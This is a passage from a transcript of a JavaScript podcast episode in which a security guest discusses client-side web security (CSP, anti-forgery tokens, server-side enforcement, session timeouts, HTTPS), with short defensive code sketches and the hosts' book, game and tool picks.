But a CSP can say for example, “This page or this site is not allowed to run any unsafe inline script.” So, you're not allowed to have a script tag in the HTML because that's often the way that cross-site scripting attacks are mounted. You could have a CSP which says, “This page is not allowed to be framed inside another page which might then lead to something like a click-jacking attack where they trick the user into clicking a button on the target website.” So, there are lots of things coming down which implement security controls in the client. And the clients themselves, predominantly the browsers, are getting much, much better at recognizing these security paradigms and adding new things to protect users as well.
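
For reference, a CSP is just a response header. Here is a minimal sketch of the two policies mentioned, allowing scripts only from your own origin (which blocks inline script) and refusing to be framed, set from a hypothetical Express middleware; the directives any real app needs will vary.

```javascript
// Scripts may only come from our own origin (which also disallows inline <script> blocks),
// and no other page may frame us (mitigating click-jacking).
app.use(function (req, res, next) {
  res.setHeader('Content-Security-Policy',
    "default-src 'self'; script-src 'self'; frame-ancestors 'none'");
  next();
});
```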

JAMISON:

So, I'm still not sure what I as a client-side developer, what actions should I be taking? Or is this something that the frameworks will handle for me?

TROY:

Well, I think…

JAMISON:

Not with CSP particularly but just with client-side security in general.

TROY:

The other main thing with client-side security, if you're using a framework, and let's say it's Angular which is what I'm most familiar with, is to understand what the security paradigms are within that framework. So for example, is Angular going to automatically output encode responses? And certainly with Angular that's your default position. You can still output unencoded, or rather not output encode, untrusted data if you explicitly choose to. But if someone tries to exploit a risk in your website running Angular to get script to run in the client, how is Angular going to handle it? And more than anything, I think the thing here is to actually understand how the framework actually deals with it.

And the risk, I'd say, is that very often these days we get people who come and use client-side frameworks which are getting better and better and do a very good job of actually abstracting away the mechanics underneath, and they don't understand how the security actually works. For example, how does your client-side framework do anti-forgery tokens? Are you actually consciously thinking about that when you're constructing your API calls? Or is that something that happens implicitly or, as is often the case, is that something that doesn't happen at all? And what you'll find is that all of these frameworks do have some pretty good documentation around what their security paradigms are as well. So, I'd really encourage people to go and try and understand what the controls are that they have in place.
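
As one concrete example of "know your framework's paradigm": Angular 1's $http service will, by documented convention, read a cookie named XSRF-TOKEN and echo it back as an X-XSRF-TOKEN header on requests to the same origin, so the server only has to issue the cookie and verify the header. Below is a hedged Express-side sketch of that double-submit pattern; it assumes the cookie-parser middleware, and generateRandomToken and createOrder are hypothetical.

```javascript
// Issue the anti-forgery token as a cookie the client-side framework knows how to read.
// It deliberately is NOT httpOnly, because client script must copy it into a header.
app.use(function (req, res, next) {
  if (!req.cookies['XSRF-TOKEN']) {
    res.cookie('XSRF-TOKEN', generateRandomToken());
  }
  next();
});

// Double-submit check: a page on another origin cannot read our cookie,
// so it cannot supply a matching header with its forged request.
function verifyXsrf(req, res, next) {
  if (!req.cookies['XSRF-TOKEN'] ||
      req.headers['x-xsrf-token'] !== req.cookies['XSRF-TOKEN']) {
    return res.sendStatus(403);
  }
  next();
}

app.post('/api/orders', verifyXsrf, createOrder);
```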

JOE:

So, there's a specific scenario that I've actually been dealing with lately. And that is sort of the difference between authentication, an authenticated view versus an unauthenticated view on the client-side. So for example, with Angular 1 you can easily specify in there that, “Hey, unless you're authenticated you can't access these particular routes.” But that's not really secure because it is on the client. So, somebody could do some script injection and potentially rewrite that so that a route that you are trying to make unavailable is now available. Could you give us some clarity, feedback on that?

TROY:

Well, I think probably the overarching theme there for people to be really aware of is what controls are just purely client-side controls versus what controls actually have corresponding server-side controls. Because what you've got to remember is that anything in the client can be modified. So, you might create a beautiful, elegant single-page app style implementation with lots of neat client-side scripting. And you're building this so that it integrates with the backend. But how many of the controls just purely exist on the client? And as soon as you take the client either out of the picture or you modify the client, and modern-day browser dev tools are very, very good at modifying the DOM, what happens then?

So for example, if you have, let's say, security trimming where certain features are not visible on the client, does that have the same corresponding server-side control? So, you may no longer have the button that allows you to do something like perform a transaction but if you were to hit that API directly, let's say you went and just created an HTTP request with wget or curl or something like that, could you still perform that action? So, are all those client-side controls actually replicated on the server? Some server-side frameworks are very good at doing that. So, they'll emit the client-side controls and they'll implement the server-side controls. But with client-side only frameworks, you're probably going to have to think more about, does that API on the backend actually implement the same level of security?
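
A minimal sketch of replicating the client-side trimming on the server: even with the button hidden in the UI, the API the button would have called re-checks authorization, so a hand-crafted wget or curl request is rejected rather than executed. requireRole and performTransaction here are hypothetical names.

```javascript
// The client may hide the transfer button from non-admins, but that is only advisory.
// The control that actually matters lives here, on the API itself.
function requireRole(role) {
  return function (req, res, next) {
    if (!req.user || req.user.roles.indexOf(role) === -1) {
      return res.sendStatus(403); // also rejects direct curl/wget/fetch calls
    }
    next();
  };
}

app.post('/api/transactions', requireRole('admin'), function (req, res) {
  performTransaction(req.user, req.body, function (err, result) {
    if (err) { return res.sendStatus(500); }
    res.json(result);
  });
});
```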

JAMISON:

I've heard it described as client-side security is basically advisory. And that…

TROY:

Yeah. And it is. And how it's…

JAMISON:

You just enforce it on the server.

TROY:

It's good, right? Because client-side based security is, it's responsive. It keeps load off the server. It allows you to do some really neat things. But you've got to complement it. And this is also the sort of things that automation can pick up. Automated tools are very good at picking up what sort of controls might be lacking on the server. So yeah, you've got to… I think actually that's a really good way of putting it. Advisory is really neat. [Laughs]

JOE:

[Laughs]

TROY:

So, assume that it's not going to be there. And another thing you can do as well for folks listening to this that are web developers, you're probably familiar with tools like Fiddler or Charles proxy on the Mac. They're really neat ways of actually watching requests that are going from the client to the server. And then dragging them over to the composer and actually modifying. So, have a go at that as well, particularly if you've got a multi-monitor setup. Put your HTTP proxy on one screen, your web app on the other screen, browse around, watch the requests. And then just try and mess it up as bad as you can [chuckles] and reissue requests with malicious pieces of data or remove things like the bearer token or the authorization cookie and then see what happens.
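
The same experiment can be scripted once you have seen a request in the proxy: replay it with the credentials stripped and see what comes back. A rough sketch, assuming a fetch implementation and a made-up endpoint:

```javascript
// Re-issue a captured API request WITHOUT its Authorization header or cookies.
// If this returns 200 and real data, the server is trusting the client far too much.
fetch('https://app.example.com/api/accounts/42', { method: 'GET' })
  .then(function (res) {
    console.log('Status without credentials:', res.status); // expect 401 or 403
    return res.text();
  })
  .then(function (body) {
    console.log(body.slice(0, 200)); // peek at what, if anything, came back
  });
```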

JOE:

Do you have a course where you talk about this in more depth?

TROY:

Yeah, so I have got an AngularJS security course on Pluralsight which is probably the most relevant to the audience here. Otherwise something like Hack Yourself First which is a Pluralsight course. It's also the workshop I do, which goes through all the sorts of things we spoke about in terms of cross-site scripting defenses and a whole raft of different web-centric security paradigms.

JOE:

For somebody who's a React developer, would they find still a fair amount of valuable content in those?

TROY:

Yeah. And it's funny actually. So, when I did the Angular course I originally didn't want to align it with a framework because in my mind, the vast majority of the security concerns are more about how the client is communicating with the server as opposed to what's happening within the client itself. And ultimately, all of these frameworks as neat as they are, they're just running script in the client. There are some very unique security paradigms to these frameworks. So, how do they do cross-site request forgery tokens? How do they do output encoding? But for the most part, it's about how do they communicate with the server in terms of the security implications? And in that regard, it's one of the first things I say in the Angular course. I'm going to use Angular to give you the examples but the same principles apply to every framework.

JOE:

So, one of the things that I heard recently when I was dealing with some routing issues was people saying, “Hey, you shouldn't even be doing or trying to figure out how to hide routes on the client. Instead you should have your server tell you that based on your user's authentication and authorization status, these are the menu options that they should see. These are the routes that they should see.” And so, the client never has a need for, “Hey, they can't go to this particular view or this page,” because it all comes from the server.

And again, being that this is advisory that's not by itself particularly secure. But do you have an opinion on that sort of a setup versus your more typical, “I've got everything down there but because you are not an admin, these particular routes, maybe they aren't visible just because we've hid the DOM elements but also if you try to go there you're going to get rejected. Then if you did happen to get there and you try to do the actual functionality the server wouldn't let you.”

TROY:

I think it comes back to the same point about if you take the client out of the picture altogether, are you satisfied with the way the app runs? And if the route exposes something of a nature that you don't want publicly visible, then you've got a problem.

For example if you have a template that might have some sensitive data in it, then okay, we can argue that probably shouldn't happen in the first place. [Chuckles] But hypothetically, then you've got to think about, “Alright, well do I need to have an authorization control on the server itself that actually protects that resource from being loaded in the first place?” And you can't just rely on what is then effectively obfuscation by the client simply not exposing it to an unauthenticated user. You've got to actually lock that resource down. Because before you know it, it gets indexed somewhere or it gets forcibly crawled or discovered in some other way. So yeah, go back to that point, take the client out of the picture, here are all the things that are accessible. Am I happy with that state?

JOE:

Okay. Now what about something like, this is another question that I recently was thinking about, and that is timeouts. Let's say you've got somebody. They're at a computer terminal. They're using your client-side single-page application, your React app, your Angular app. Their session, either they logout or their session just times out. Theoretically if somebody else got onto that computer and was really good with the DOM they might be able to show a view and actually look at data that was down there on the client, that they shouldn't normally have had access to.

TROY:

Yeah, good question. So, you mean data that might persist on the client post the end of the authenticated session?

JOE:

Right. Now, if they explicitly log out, then to clean that up probably the best way, I assume, is just to refresh the page to get that data out of there, right? But if they don't click logout and their session just times out…

TROY:

Yeah, right. So, if you're not explicitly unloading things from the DOM then you might have an issue.

JOE:

Right.

TROY:

So, I guess the question then is, that logout call, is that actually going to explicitly flush things from the DOM, expire cache, do whatever it needs to do? Because that is kind of the assumption that you have to work on. And in fact, there are a couple of assumptions you got to work on. So, one is that if people logout they expect to then have anything discarded which might still be persistent about the session. The other assumption to work on is that people are just going to close the browser. So, they're not going to logout. They're going to go to the internet café, do their banking, and then just go, [inaudible] close the browser. And of course many browsers are just going to reopen with all the tabs [chuckles] reinstated. So, that's a little bit of a problem.

And then there's the other issue, and this is yes it's a user problem but you need to think about as a developer as well, is what happens when the user doesn't do anything? They just walk away from the machine and they leave it. And then we sort of start to talk about, okay well, should we have sessions that are just short-running, that expire after say 10 minutes of inactivity? Like your bank does. And then if we do something more like the Stack Overflow approach and we just stay authenticated for, almost for perpetuity it feels like, certainly for a month or so, does that pose a risk? And then that's going to be very case-by-case, right?

So, is my application the sort of application where we want really low friction for usage and there's a low-risk if someone else sits down at it? Or do we have one that's more in the finance space where there's a really high impact if someone else gains access to any of this information and we're happy to raise the bar for usability and actually make things a bit more difficult in order to improve security?
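
On the client side, one rough sketch of the "walked away from the machine" case: an idle timer that, after whatever inactivity window suits the app, calls logout and forces a fresh load so nothing sensitive lingers in the DOM or in in-memory state. The /logout and /login paths are assumptions.

```javascript
// After 10 minutes with no interaction, log the session out and reload,
// discarding anything sensitive still held in the DOM or in client-side state.
var IDLE_LIMIT_MS = 10 * 60 * 1000;
var idleTimer;

function resetIdleTimer() {
  clearTimeout(idleTimer);
  idleTimer = setTimeout(function () {
    fetch('/logout', { method: 'POST', credentials: 'include' })
      .then(function () { window.location.replace('/login'); })
      .catch(function () { window.location.replace('/login'); });
  }, IDLE_LIMIT_MS);
}

['click', 'keydown', 'mousemove', 'touchstart'].forEach(function (evt) {
  document.addEventListener(evt, resetIdleTimer);
});
resetIdleTimer();
```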

JOE:

Yeah, that's a good summation. What do you think people should be doing? Do you have a guideline on that? Or is it just case-by-case?

TROY:

Well, I think they should be consciously thinking about it [laughs] which is the first thing. And actually, that in itself is a broader theme. How many design decisions about application security happen implicitly? So yeah, in a case like the duration of sessions, are you just going with the default of the application framework? Or are you saying, hey look, based on this particular application how long should we actually make this? Should we actually… is 20 minutes really the perfect solution for everybody? [Laughs] Or should it possibly be something else? And interestingly, you have to think about the places within an app where security is often implicit.

So, a really good example is password length. And I often say to people, “Alright so what's the minimum password length on your site?” And they'll say, “Well, it's eight characters.” And why is that? “Well, we've just always done it this way.” And it's really funny actually, because I was saying to people, what should it be? And they normally always either say six or eight or some other even number. And I haven't quite worked out why this is. But apparently password lengths should always be a minimum that is an even number. So, if anyone listening can figure out why [chuckles] it's always an even number…

JOE:

[Laughs]

TROY:

And oddly enough, the number of retries before locking out an account is always an odd number. It's always three or five. [Laughs]

JOE:

[Chuckles]

TROY:

So, if anyone, maybe a psychologist or something out there knows why that is, please let me know, because I'm pretty serious.

AIMEE:

I know some cases where it's not. [Laughs]

TROY:

[Chuckles]

AIMEE:

Not an odd number.

TROY:

Well, that would be interesting.

JOE:

So, some of these cases, especially [inaudible] like cached data on the client side, that has a lot to do with the framework that you use, right? Like, I don't know exactly how Angular or React might be holding onto my data. And I think with React it's a little bit more about how I decide to do it. But if I download some data and I have, say in Angular, a scope variable that has data on it, is that accessible to somebody else after a user's session may have timed out, or even after they click logout if I don't do anything specific? How do I find answers to those questions and figure that out? Especially if it takes somebody smarter, or at least more familiar with crazy DOM hacking and the tools, to determine if they can get to it. You don't want to have to assume that you've got to be as smart as any hacker and know all their tools. I just want to do what's right.

TROY:

Well, I think the first step is acknowledging that you need to know. [Laughs] This is really, really critical. Don't just trust that the framework would do everything that you think it should do. Figure out how it works. So, for something like the expiration of content, what is the actual implementation in the framework? A really easy way of testing this would be to say, let me open up two browser windows authenticated into the same resource on both. Let's logout of one of them and let's try and click around on the other one. Do I still have access to anything that might still be cached on the client? That would be a pretty rudimentary test.

But beyond that I would actually go and try and see, can you actually script in the console and access resources that you really shouldn't be able to once you've actually logged out of one of those other browser windows? So, you can test a lot of this and also use resources like Stack Overflow to ask these questions. There's also a security Stack Exchange that's quite useful to be able to post questions of that nature on as well.

JOE:

Cool. One of the things we always like to ask, is there any particularly important topics that we haven't really discussed yet that should be discussed on the show?

TROY:

I think maybe one generally around security, and we touched on it very briefly, is that we are rushing forward as an industry to HTTPS everywhere, and to increasingly good implementations of HTTPS. If you're starting a website today, just start the whole thing out over HTTPS. So, I recently set up a blog for my wife, just a basic Ghost blog, and we just went, alright, day one, HTTPS. Because what we're starting to see is the browsers holding people increasingly accountable for HTTPS. We're seeing Google use HTTPS as a ranking signal; they'll actually boost your search ranking if you've got HTTPS. We're seeing murmurs about browser vendors wanting to start flagging insecure connections, which are kind of what we're used to as the default position, as insecure, as opposed to just not flagging them at all. So, now would be a really good time, if you're building new stuff or revising existing stuff, to just start moving the whole thing to a secure-by-default position. It's going to make your life a lot easier over the coming years.
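
For what secure-by-default can look like in practice, here's a minimal sketch of forcing HTTPS in a Node/Express app. It assumes the app runs behind a proxy or load balancer that sets x-forwarded-proto, and the Strict-Transport-Security value is just an example; only add includeSubDomains or preload once everything reliably serves HTTPS:

```javascript
// Minimal sketch: redirect plain HTTP to HTTPS and opt in to HSTS.
// Assumes an Express app behind a proxy that sets x-forwarded-proto.
const express = require('express');
const app = express();

app.enable('trust proxy'); // so req.secure reflects x-forwarded-proto

app.use((req, res, next) => {
  if (!req.secure) {
    // Permanent redirect to the HTTPS version of the same URL.
    return res.redirect(301, 'https://' + req.headers.host + req.originalUrl);
  }
  // Tell browsers to use HTTPS for future requests (value is an example).
  res.setHeader('Strict-Transport-Security', 'max-age=31536000');
  next();
});

app.get('/', (req, res) => res.send('Served over HTTPS'));
app.listen(process.env.PORT || 3000);
```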

JOE:

Cool, I like that. That's good advice. Alright well, if that's all that we've got I think we'll move onto picks. Aimee, are you ready to do your picks?

AIMEE:

Yeah. So, I don't have a lot this week, but I did want to pick one. It is a GitHub account, and I'm going to have to put the link in the show notes because I'm not exactly sure how to pronounce the username. But it's just called awesome-react, and I think I picked a similar one for Angular a while back. It's just a GitHub account with tons of links to different conference videos and books and tutorials, pretty much everything you could want. So, that will be my pick this week.

JOE:

Awesome. Jamison, how about you?

JAMISON:

I have three picks. I'm doing some conference talk preparation, and as is traditional I'm reading Dijkstra quotes, because he's one of those people you could just quote in every conference talk no matter what it's about. So, my pick is Dijkstra quotes. I don't know, he was like if Crockford was way smarter and less offensive but still equally grumpy. I think you'd start to approach something like the tone that Dijkstra strikes in his quotes.

JOE:

[Laughs]

JAMISON:

He's just eminently quotable, just solid stuff.

My next pick is a blog post called 'Human Error and Blame Culture'. It's about an outage that happened at this Telecom company. And this person is analyzing the outage and the Telecom company's reaction to it. And they basically blamed it on a person. Like, the outage happened because this ops engineer person connected people to the wrong node or something. And he talks about how that kind of thinking can prevent you from fixing systemic problems that you have in your infrastructure. If you just say, “Well, someone made a mistake,” the question is why can one person make a mistake and bring down your whole infrastructure?

My last pick is a book called 'Infinite Jest' by David Foster Wallace. It's one of these prestige books. It's really thick. It's got a reputation for being hard to get through. But it's really funny. In a way it feels like a book written about today's internet culture even though it was written in 1996. Yeah, I've just been really enjoying it. It is a lot of work to get through but it feels worth it.

Those are my picks. Oh, I didn't mean to say that Douglas Crockford wasn't smart by the way. I'm just saying Dijkstra is smarter than he is. That wasn't an insult to Crockford. It was like Dijkstra is a super smart guy. Those are my picks.

AIMEE:

I don't think he listens anyway. [Laughs]

JAMISON:

Yeah, that's true. It's not like he's [inaudible]. It might offend AJ. AJ loves Crockford. That's all I got.

JOE:

Okay, awesome. So, I just want to key in on something you said about that book. That sounds a lot like, I know there's a book, something called 'Black Box Diagnosis' or something like that. It talks about how the airline industry uses black boxes to fix their issues: they read what happened from the black box, figure out what went wrong, and try to change the system; versus industries where they just try to blame a person and not fix the system.

JAMISON:

Oh, sure.

JOE:

And I guess in the book the story was about a guy who was a pilot and whose wife died from a medical error. He was used to how, in the airline industry, there's a big inquisition and then they figure out, “Alright, how can we eliminate the possibility of this human error?” And that's not what happens in the medical industry. So, he contrasts the airline industry and the medical industry.

So alright, I'll move ahead with my picks and then we'll have Troy's picks last. I want to make a couple of picks. The first one is a board game I played called 'T.I.M.E. Stories'. And what's really cool about 'T.I.M.E. Stories', which right off the bat is going to sound not cool, is the fact that you can only play the game once. And for a 50 or 60-dollar game, I can't remember exactly how much it was, I didn't buy it, my friend did, that seems counterintuitive, to buy a game that you can only play once. But the way it works is the base game is the setup and then you buy modules. And I think the modules still aren't cheap, 20 or 30 dollars. But you sit down with three or four other people and you play through the game. And each time you play it's an entirely different game, but you have to buy another set.

And it's sort of this story about you time traveling. Think maybe Assassin's Creed. You're traveling back in time and you've got to figure out a mystery. But it's really difficult, so what we found happened is we actually failed our first try. So, we'll replay the same scenario multiple times to try to succeed. So, there is some replayability to it, but once you've figured it out, there's no real reason to play through the same scenario again. You have to buy a new scenario. Which again sounds at first like maybe that's not the greatest thing, but so far it's actually been really cool. I've been highly impressed with it.

We super enjoyed the time that we played together. It's a cooperative, mystery-based game where you're all working together trying to figure out the mystery. So, in the basic scenario that comes with the base game, you travel back to the 1920s and possess the bodies of inhabitants of an insane asylum, trying to figure out some mystery that's going on there. And it's again, à la Assassin's Creed for anybody who's played that: you go back from the future and inhabit somebody else's body. But super cool.

The other pick that I want to make is a not-pick. Like an anti-pick. I bought a really nice Razer gaming mouse, and the thing broke within six months. And for an 80-dollar mouse, I did not expect it to break within six months. I talked to some buddies and found out this is actually a really common thing: they tend to have problems with their mouse clicks, and after a while they start double-clicking whenever you press them once. There's something faulty in there. So, I ended up buying what one of them recommended, which is a ROCCAT, R-O-C-C-A-T, mouse. And he says he's had better experiences with that. I haven't had any issues yet, but I've only had this mouse for like a month. But I like having a nice, solid mouse that maybe has a little bit of programmability in it, macros for gaming. And I was really disappointed that my Razer mouse blew up on me so quickly.

So, those are my picks. Troy, how about you?

TROY:

Let me give you a couple. I'll give you one from someone else and then one from me. So, I've got a good book. In fact it came out a couple of years ago now, but it's still one of my favorite security-oriented books. It's called 'We Are Anonymous' and it's by a lady called Parmy Olson. It was just a really, really interesting book about some of the hacktivist folks from a few years ago, particularly the likes of LulzSec. And she interviewed a bunch of them after some of them were arrested as well. It's just a very interesting insight into what makes these people tick. And it wasn't written as a hardcore security book; it was one I actually really enjoyed sitting down and reading, one of those books you just want to keep picking up [chuckles] and going back to. So, 'We Are Anonymous' by Parmy Olson is one from someone else.

One from me that people might find useful, I run a little project called 'Have I Been pwned?', HaveIBeenPwned.com, which aggregates data breaches. So, there are about 70 [odd] data breaches in there. I've got about 300 million records from various breaches where you can search for your exposure and see where you've been impacted. So, I've been in the Adobe data breach. I mentioned Patreon before, a couple of others. One thing that folks on this call might find particularly interesting is there's a free API. So, if someone would like to build awesome stuff and awesome apps that use these large-scale data breaches in order to do something good [chuckles] then please go and use the API. There's no registration or auth or rate-limiting or anything like that. Just go nuts. It's on Azure. Magic will happen. Stuff will scale. [Laughs] And if you do something cool, let me know and I'll give it a plug. So, go and have a good play with it, folks.
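
For anyone who wants to try that API, here's a minimal sketch of querying it from Node. The breachedaccount path below reflects the v2 API that was documented around the time of this episode; the API has been versioned since and the current version may require an API key and a User-Agent header, so treat this as illustrative and check the documentation at HaveIBeenPwned.com before building on it:

```javascript
// Minimal sketch: look up breaches for an account via the Have I Been Pwned
// API. The exact version, auth requirements, and rate limits have changed
// over time -- check the official API docs before relying on this.
const https = require('https');

function checkAccount(account) {
  const options = {
    hostname: 'haveibeenpwned.com',
    path: '/api/v2/breachedaccount/' + encodeURIComponent(account),
    headers: { 'User-Agent': 'example-breach-checker' } // the API asks for a UA
  };

  https.get(options, res => {
    let body = '';
    res.on('data', chunk => { body += chunk; });
    res.on('end', () => {
      if (res.statusCode === 200) {
        console.log('Breaches:', JSON.parse(body));
      } else if (res.statusCode === 404) {
        console.log('No breaches found for', account);
      } else {
        console.log('Unexpected response:', res.statusCode, body);
      }
    });
  }).on('error', err => console.error('Request failed:', err));
}

checkAccount('someone@example.com');
```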

JOE:

Excellent. I love that URL by the way, domain name. It's an awesome domain name.

TROY:

The best bit is when it's in French media and hearing the French pronounce it. It's awesome. [Chuckles]

JOE:

Oh really? [Laughs] That sounds like it. Well, thanks again for being on our show.

JAMISON:

Yeah, thank you.

JOE:

We really appreciate the time.

TROY:

No worries, guys. It's a pleasure.

JOE:

It was a great discussion and thanks everybody for listening in. And we will be back next week.

[Hosting and bandwidth provided by the Blue Box Group. Check them out at BlueBox.net.]

[Bandwidth for this segment is provided by CacheFly, the world’s fastest CDN. Deliver your content fast with CacheFly. Visit CacheFly.com to learn more.]

[Do you wish you could be part of the discussion on JavaScript Jabber? Do you have a burning question for one of our guests? Now you can join the action at our membership forum. You can sign up at JavaScriptJabber.com and there you can join discussions with the regular panelists and our guests.]
